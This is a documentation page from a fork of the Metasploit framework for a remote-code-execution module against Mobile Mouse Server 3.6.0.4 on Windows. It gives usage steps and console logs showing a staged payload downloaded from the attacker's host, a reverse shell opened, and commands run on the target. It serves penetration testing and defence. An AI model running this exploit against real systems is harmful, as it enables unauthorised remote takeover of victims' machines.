adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/misc/mobile_mouse_rce.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

97 lines
3.3 KiB
Markdown
Raw Normal View History

mobile mouse server exploit
2022-09-26 15:45:42 -04:00
## Vulnerable Application
This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol
to deploy a payload and run it from the server. This module will only deploy
a payload if the server is set without a password (default).
Tested against 3.6.0.4, current at the time of module writing
Version 3.6.0.4 can be downloaded from https://www.mobilemouse.com/downloads/setup.exe
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/mobile_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Mobile Mouse.
## Options
### SLEEP
The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to `3`, but can be a little touchy.
## Scenarios
### Mobile Mouse 3.6.0.4 on Windows 10
```
resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mobile_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (mobile_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (mobile_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/mobile_mouse_rce) > run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:9099 - Client name set to: M6braOok6j
[*] 1.1.1.1:9099 - Connecting
[+] 1.1.1.1:9099 - Connected to hostname WIN10PROLICENSE with MAC address 00:0C:29:B3:68:3D
[*] 1.1.1.1:9099 - Opening Command Prompt
[*] 1.1.1.1:9099 - Sending stager
[*] 1.1.1.1:9099 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:9099 - Opening Command Prompt again
[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:9099 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49696) at 2022-09-26 15:40:03 -0400
[*] 1.1.1.1:9099 - Server stopped.
[!] 1.1.1.1:9099 - This exploit may require manual cleanup of 'c:\Windows\Temp\gxYUnChTLrOuA.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Windows\Temp>whoami
whoami
win10prolicense\windows
C:\Windows\Temp>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
```
### Mobile Mouse 3.6.0.4 on Windows 10, with a password
This should fail as the exploit was not written to work with a password.
```
resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mobile_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (mobile_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (mobile_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/mobile_mouse_rce) > run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:9099 - Client name set to: baqpHBHh5Q
[*] 1.1.1.1:9099 - Connecting
[-] 1.1.1.1:9099 - Exploit aborted due to failure: no-access: Unable to connect, server response: Please enter a password
[*] Exploit completed, but no session was created.
msftidy_docs
2022-09-26 15:56:43 -04:00
```
Reference in New Issue Copy Permalink